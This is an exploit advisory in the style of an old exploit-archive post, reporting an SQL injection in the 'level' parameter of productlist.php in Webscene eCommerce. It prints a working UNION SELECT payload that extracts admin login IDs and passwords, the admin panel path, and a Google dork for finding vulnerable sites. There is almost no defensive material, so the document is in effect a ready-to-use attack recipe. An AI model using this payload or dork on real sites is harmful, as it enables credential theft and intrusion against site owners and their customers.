SecurityvulnsSECURITYVULNS:DOC:20724Webscene eCommerce (level) Remote Sql Injection
#################################################################################
Webscene eCommerce (level) Remote Sql Injection
vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#################################################################################
Bug Found By :Angela Chang (14-10-2008)
contact: angel[at]ch4ng.cc
################################################################################
Greetz: nyubi & Vrs-Chk
###############################################################################
vuln file : productlist.php
Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from
adminuserβ
Login admin : http://somehost/admin/
Google dork : inurl:productlist.php?categoryid= level
########################################################################
__ _ _ _ __ _
__ _ _ _ / ` | ___ | | __ _ o O O __ | | __ _ _ _ / ` |
/ ` | | ' \ \__, | / -) | | / ` | o / | | ' \ / ` | | ' \ \, |
\,| |||| |/ \| || \,_| TS[O] \|_ |||| \,| |||| |/
|"""""||"""""||"""""||"""""||"""""||"""""| {======||"""""||"""""||"""""||"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./oβ000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'